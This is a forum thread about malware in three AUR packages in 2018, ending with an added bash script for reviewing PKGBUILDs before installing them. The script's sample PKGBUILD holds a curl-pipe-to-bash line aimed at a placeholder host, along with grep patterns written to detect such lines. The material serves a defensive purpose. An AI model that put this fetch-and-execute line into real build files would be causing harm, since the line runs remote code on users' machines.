Malware in the AUR

Author Topic: Malware in the AUR  (Read 171 times)

Offline Siva

  • Staff Member
  • ********
  • Posts: 20
  • Country: 00
  • "We're all mad here"
Malware in the AUR
« on: July 12, 2018, 04:28:00 AM »
Three programs were tampered with by someone named xeactor.

Offline CwF

  • Full Member
  • ****
  • Posts: 210
  • Country: us
Re: Malware in the AUR
« Reply #1 on: July 12, 2018, 03:44:26 PM »
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high-powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

Offline Kalthrix

  • Staff Member
  • ********
  • Posts: 966
  • Country: us
Re: Re: Malware in the AUR
« Reply #2 on: July 12, 2018, 07:56:56 PM »
Quote from: CwF
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high-powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

Honestly, the only use I have found for the older "acroread (Adobe Reader 9)" package is to display fillable PDF documents that actively refuse to display on any other PDF editor/viewer. You'll see this a lot with state, court, and federal documents. Some businesses working in realty and financial will use the same. It's irritating, to say the least. Not sure if the intent was to reach that incredibly small crowd that still use the package, to test waters to gauge reaction time from the community considering it is a rarely used package, or if the intent was to target those that prefer to use commercial software vs the open source alternatives (although old) due to familiarity.

I'll never understand people that do this. If it is just to spite others or what their actual motivation is? Why not either improve the package or make one that is better? Adobe obviously has no interest in maintaining it or we would have seen Reader or Acrobat DC brought to Linux already.

Offline fraterchaos

  • Mandelbrot Metal Mayhem!
  • Staff Member
  • ********
  • Posts: 710
  • Country: us
  • Never underestimate the power of human stupidity
    • Skype
Re: Re: Malware in the AUR
« Reply #3 on: July 12, 2018, 10:25:59 PM »
Quote from: CwF
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high-powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

The one way in which Linux can be safer is that being open source, it means a lot more people are going over the code that is added... so it's more likely that malware will be caught sooner. And when it's caught it is nearly always addressed more quickly than you could expect MS or Apple to do it. They only have a profit motive.

Not saying it's perfect, open source also enables more people to be able to add suspicious code from the start... but it still has a better chance of getting caught more quickly, I think.
Science, like Nature, must also be tamed... with a view towards its preservation. -- Rush

Offline CwF

  • Full Member
  • ****
  • Posts: 210
  • Country: us
Re: Re: Re: Malware in the AUR
« Reply #4 on: July 13, 2018, 02:59:10 PM »
Quote from: fraterchaos
... but it still has a better chance of getting caught more quickly, I think.
I think that's generally right. That's why I'm happy with apt-get stable Debian, perhaps the safest around. Once we start after the most current, or allow 'user content' or PPAs, or encourage something idiotic like flatpaks, trust ends. Even compiling from source is suspect, like you actually reviewed the code. I did say a user click. Look how stuff is getting into Android. Once 'stable' is extended into 'want' we let our guard down.

I'm aware of the proprietary PDF stuff. It's sad the government is so stupid in its conflicts of interest. I'm still amazed some states went through the Silverlight phase. It just proves most aren't paying attention.

Since the potential audience (target) was tiny in this case I suspect a grey hat demonstration.

Offline Siva

  • Staff Member
  • ********
  • Posts: 20
  • Country: 00
  • "We're all mad here"
Re: Malware in the AUR
« Reply #5 on: July 19, 2018, 12:29:47 PM »
Flatpaks can be safer. For example, OpenRA relies on Mono, and Mono adds CA certs to your system.

Installing the flatpak segregates it to its own part of your system.

Offline Spatry

  • Benevolent Dictator
  • Administrator - Sysop
  • **********
  • Posts: 4548
  • Country: us
  • Cup of Linux Founder
    • Cup of Linux
Re: Malware in the AUR
« Reply #6 on: July 19, 2018, 09:18:38 PM »
I cannot stress this enough.... When using yaourt or any other AUR helper, READ THE PKGBUILD! It will tell you what sources it is downloading.... alternatively you can download the AUR snapshot to a temp directory and run makepkg against it.... then you can look into the sources before you install the compiled package to ensure you are not getting any malware.... the AUR is a magnificent tool but it can also be your undoing if you do not exercise a little CARE.

Something I did not think of: if you are installing a package with -bin in the name, odds are you are getting a blob compiled against Ubuntu, Fedora or some other distro... in those cases you do not get the source but if it contains malware there will be comments posted on the AUR page... Always a good idea to read the comments....
"Wipe that NERVOUS expression off of your face, 3PO!" -General Leia Organa SWTLJ
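
The pre-install check Spatry describes (read the PKGBUILD, see what it downloads, look before you install) can be partly scripted. The script below is an added example, not part of the original posts; the function names, the `example-bin` package and the `example.invalid` URLs are made up for illustration.

```shell
#!/usr/bin/env bash
# Static review of a PKGBUILD: it only greps the file, never sources or runs it.

# Every URL the file mentions, i.e. where makepkg or the build would fetch from.
list_urls() { grep -Eo '(https?|ftp)://[^[:space:]"'\'')]+' "$1" | sort -u; }

# Heuristic (expect some false positives): lines that call curl/wget or pipe into
# a shell. Downloads belong in source=(), not in prepare()/build()/package().
flag_fetch_and_exec() {
    grep -nE '(^|[^[:alnum:]_-])(curl|wget)[[:space:]]|\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$1"
}

# Number of 'SKIP' checksum entries; each is a source makepkg will not verify.
count_skipped_checksums() { grep -Eo "[\"']SKIP[\"']" "$1" | wc -l | tr -d '[:space:]'; }

# Name of the install= hook, which runs as root at install time and needs reading too.
install_script() { sed -n 's/^install=["'\'']\{0,1\}\([^"'\'' ]*\).*/\1/p' "$1"; }

# Print a report; return 1 if anything needs a closer look.
review() {
    local f=$1 findings=0 skipped hook
    echo "== URLs referenced =="; list_urls "$f"
    echo "== download / pipe-to-shell lines =="
    flag_fetch_and_exec "$f" && findings=1
    skipped=$(count_skipped_checksums "$f")
    echo "== unverified sources (SKIP): $skipped =="
    [ "$skipped" -gt 0 ] && findings=1
    hook=$(install_script "$f")
    [ -n "$hook" ] && echo "== also read install hook: $hook =="
    return "$findings"
}

# Constructed sample, not a real AUR package: build() has a line that should not be there.
make_sample() {
    local dir; dir=$(mktemp -d)
    cat > "$dir/PKGBUILD" <<'EOF'
pkgname=example-bin
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('SKIP')
install=example-bin.install
build() {
    curl -s https://example.invalid/setup | bash -
}
EOF
    echo "$dir/PKGBUILD"
}

sample=$(make_sample)
review "$sample" || echo "-> findings: read the flagged lines before running makepkg"
```

In real use, call `review` on the PKGBUILD inside the extracted AUR snapshot directory; a clean report does not replace reading the file and its install hook.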